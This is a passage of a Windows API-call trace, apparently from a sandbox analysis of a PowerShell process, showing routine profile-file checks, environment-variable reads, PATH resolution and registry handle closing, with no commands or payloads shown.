	[0799.354] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b3c0970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0799.354] CoTaskMemFree (pv=0x1b3c0970) 
	[0799.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0799.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0799.355] SetErrorMode (uMode=0x1) returned 0x1
	[0799.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc00 | out: lpFileInformation=0x16dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0799.355] SetErrorMode (uMode=0x1) returned 0x1
	[0799.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0799.355] SetErrorMode (uMode=0x1) returned 0x1
	[0799.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc00 | out: lpFileInformation=0x16dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0799.355] SetErrorMode (uMode=0x1) returned 0x1
	[0799.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0799.356] SetErrorMode (uMode=0x1) returned 0x1
	[0799.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc00 | out: lpFileInformation=0x16dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0799.356] SetErrorMode (uMode=0x1) returned 0x1
	[0799.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0799.356] SetErrorMode (uMode=0x1) returned 0x1
	[0799.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc00 | out: lpFileInformation=0x16dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0799.356] SetErrorMode (uMode=0x1) returned 0x1
	[0799.357] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0799.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.357] CoTaskMemFree (pv=0x2b2450) 
	[0799.357] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0799.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.358] CoTaskMemFree (pv=0x2b2450) 
	[0799.358] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0799.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.358] CoTaskMemFree (pv=0x2b2450) 
	[0799.359] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0799.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.359] CoTaskMemFree (pv=0x2b2450) 
	[0799.359] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0799.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.359] CoTaskMemFree (pv=0x2b2450) 
	[0799.360] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0799.361] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.361] CoTaskMemFree (pv=0x2b2450) 
	[0799.362] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0799.364] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16dde0 | out: lpMode=0x16dde0) returned 1
	[0800.284] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0800.284] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.284] CoTaskMemFree (pv=0x2b2450) 
	[0800.287] SetEvent (hEvent=0x318) returned 1
	[0800.288] SetEvent (hEvent=0x2dc) returned 1
	[0800.288] SetEvent (hEvent=0x310) returned 1
	[0800.288] SetEvent (hEvent=0x390) returned 1
	[0800.290] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0800.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.290] CoTaskMemFree (pv=0x2b2450) 
	[0800.290] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db38 | out: phkResult=0x16db38*=0x348) returned 0x0
	[0800.290] RegQueryValueExW (in: hKey=0x348, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16dabc, lpData=0x0, lpcbData=0x16dab8*=0x0 | out: lpType=0x16dabc*=0x0, lpData=0x0, lpcbData=0x16dab8*=0x0) returned 0x2

Thread:
	id = 411
	os_tid = 0x1058


Thread:
	id = 414
	os_tid = 0x1064


Thread:
	id = 1138
	os_tid = 0x1aac


Thread:
	id = 1140
	os_tid = 0x1a5c


Thread:
	id = 1148
	os_tid = 0x1124


Thread:
	id = 1165
	os_tid = 0x1714


Thread:
	id = 1173
	os_tid = 0x174c

	[0588.583] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0641.014] RegCloseKey (hKey=0x2f4) returned 0x0
	[0641.014] RegCloseKey (hKey=0x2fc) returned 0x0
	[0641.015] RegCloseKey (hKey=0x2f8) returned 0x0
	[0738.824] LocalFree (hMem=0x2271b0) returned 0x0
	[0738.824] RegCloseKey (hKey=0x310) returned 0x0
	[0738.824] LocalFree (hMem=0x227290) returned 0x0
	[0738.824] CloseHandle (hObject=0x2dc) returned 1
	[0738.825] CloseHandle (hObject=0x13) returned 1
	[0738.825] CloseHandle (hObject=0xf) returned 1
	[0751.477] RegCloseKey (hKey=0x2dc) returned 0x0
	[0782.475] RegCloseKey (hKey=0x388) returned 0x0
	[0782.475] RegCloseKey (hKey=0x364) returned 0x0
	[0782.478] RegCloseKey (hKey=0x3a0) returned 0x0
	[0782.479] RegCloseKey (hKey=0x380) returned 0x0
	[0782.479] RegCloseKey (hKey=0x37c) returned 0x0
	[0782.479] RegCloseKey (hKey=0x378) returned 0x0
	[0782.479] RegCloseKey (hKey=0x374) returned 0x0
	[0782.480] RegCloseKey (hKey=0x370) returned 0x0
	[0782.480] RegCloseKey (hKey=0x36c) returned 0x0
	[0782.480] RegCloseKey (hKey=0x368) returned 0x0
	[0782.481] RegCloseKey (hKey=0x340) returned 0x0
	[0782.481] RegCloseKey (hKey=0x39c) returned 0x0
	[0782.481] RegCloseKey (hKey=0x398) returned 0x0
	[0782.481] RegCloseKey (hKey=0x360) returned 0x0
	[0782.482] RegCloseKey (hKey=0x35c) returned 0x0
	[0782.482] RegCloseKey (hKey=0x358) returned 0x0
	[0782.482] RegCloseKey (hKey=0x354) returned 0x0
	[0782.482] RegCloseKey (hKey=0x350) returned 0x0
	[0782.483] RegCloseKey (hKey=0x34c) returned 0x0
	[0782.483] RegCloseKey (hKey=0x348) returned 0x0
	[0782.483] RegCloseKey (hKey=0x344) returned 0x0
	[0782.484] RegCloseKey (hKey=0x394) returned 0x0
	[0782.484] RegCloseKey (hKey=0x334) returned 0x0
	[0782.484] RegCloseKey (hKey=0x330) returned 0x0
	[0782.484] RegCloseKey (hKey=0x32c) returned 0x0
	[0782.485] RegCloseKey (hKey=0x328) returned 0x0
	[0782.485] RegCloseKey (hKey=0x324) returned 0x0
	[0782.485] RegCloseKey (hKey=0x320) returned 0x0
	[0782.485] RegCloseKey (hKey=0x31c) returned 0x0
	[0782.486] RegCloseKey (hKey=0x318) returned 0x0
	[0782.486] RegCloseKey (hKey=0x390) returned 0x0
	[0782.486] RegCloseKey (hKey=0x310) returned 0x0
	[0782.486] RegCloseKey (hKey=0x2dc) returned 0x0
	[0782.487] RegCloseKey (hKey=0x38c) returned 0x0
	[0893.116] RegCloseKey (hKey=0x348) returned 0x0

Thread:
	id = 1205
	os_tid = 0x1a50


Thread:
	id = 1690
	os_tid = 0x239c

	[0801.127] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0801.132] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0801.139] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0801.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.139] CoTaskMemFree (pv=0x2b2450) 
	[0801.141] VirtualQuery (in: lpAddress=0x1c74d7a0, lpBuffer=0x1c74e660, dwLength=0x30 | out: lpBuffer=0x1c74e660*(BaseAddress=0x1c74d000, AllocationBase=0x1bdc0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0801.145] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0801.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.145] CoTaskMemFree (pv=0x2b2450) 
	[0801.148] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0801.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.148] CoTaskMemFree (pv=0x2b2450) 
	[0801.151] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0801.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.151] CoTaskMemFree (pv=0x2b2450) 
	[0801.171] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0801.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.172] CoTaskMemFree (pv=0x2b2450) 
	[0802.110] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0802.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.110] CoTaskMemFree (pv=0x2b2450) 
	[0802.112] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0802.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.112] CoTaskMemFree (pv=0x2b2450) 
	[0802.117] VirtualQuery (in: lpAddress=0x1c74da50, lpBuffer=0x1c74e910, dwLength=0x30 | out: lpBuffer=0x1c74e910*(BaseAddress=0x1c74d000, AllocationBase=0x1bdc0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0802.118] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0802.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.118] CoTaskMemFree (pv=0x2b2450) 
	[0802.120] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0802.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.121] CoTaskMemFree (pv=0x2b2450) 
	[0802.121] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0802.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.121] CoTaskMemFree (pv=0x2b2450) 
	[0802.122] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0802.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.122] CoTaskMemFree (pv=0x2b2450) 
	[0802.128] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0802.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.128] CoTaskMemFree (pv=0x2b2450) 
	[0803.026] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0803.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.026] CoTaskMemFree (pv=0x2b2450) 
	[0803.028] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0803.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.028] CoTaskMemFree (pv=0x2b2450) 
	[0803.827] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0803.827] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.827] CoTaskMemFree (pv=0x2b2450) 
	[0803.830] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0803.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.830] CoTaskMemFree (pv=0x2b2450) 
	[0803.831] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0803.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.831] CoTaskMemFree (pv=0x2b2450) 
	[0803.833] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0803.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.833] CoTaskMemFree (pv=0x2b2450) 
	[0803.835] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0803.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.835] CoTaskMemFree (pv=0x2b2450) 
	[0803.853] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0803.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0803.853] CoTaskMemFree (pv=0x2b2450) 
	[0808.364] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0808.364] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0808.364] CoTaskMemFree (pv=0x2b2450) 
	[0808.367] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0808.367] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0808.367] CoTaskMemFree (pv=0x2b2450) 
	[0808.367] CoTaskMemAlloc (cb=0x128) returned 0x1b3c51e0
	[0808.367] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b3c51e0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0808.367] CoTaskMemFree (pv=0x1b3c51e0) 
	[0808.372] CoTaskMemAlloc (cb=0x20e) returned 0x1b3c25e0
	[0808.372] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b3c25e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0808.372] CoTaskMemFree (pv=0x1b3c25e0) 
	[0808.376] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0808.377] SetErrorMode (uMode=0x1) returned 0x1
	[0808.380] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0809.377] SetErrorMode (uMode=0x1) returned 0x1
	[0809.379] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0809.379] SetErrorMode (uMode=0x1) returned 0x1
	[0809.379] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.671] SetErrorMode (uMode=0x1) returned 0x1
	[0810.672] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.673] SetErrorMode (uMode=0x1) returned 0x1
	[0810.673] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.684] SetErrorMode (uMode=0x1) returned 0x1
	[0810.686] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.686] SetErrorMode (uMode=0x1) returned 0x1
	[0810.686] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.696] SetErrorMode (uMode=0x1) returned 0x1
	[0810.698] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.698] SetErrorMode (uMode=0x1) returned 0x1
	[0810.698] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.710] SetErrorMode (uMode=0x1) returned 0x1
	[0811.712] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.712] SetErrorMode (uMode=0x1) returned 0x1
	[0811.712] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.814] SetErrorMode (uMode=0x1) returned 0x1
	[0811.817] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.817] SetErrorMode (uMode=0x1) returned 0x1
	[0811.817] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.825] SetErrorMode (uMode=0x1) returned 0x1
	[0811.827] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.827] SetErrorMode (uMode=0x1) returned 0x1
	[0811.827] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.835] SetErrorMode (uMode=0x1) returned 0x1
	[0811.837] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.837] SetErrorMode (uMode=0x1) returned 0x1
	[0811.837] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
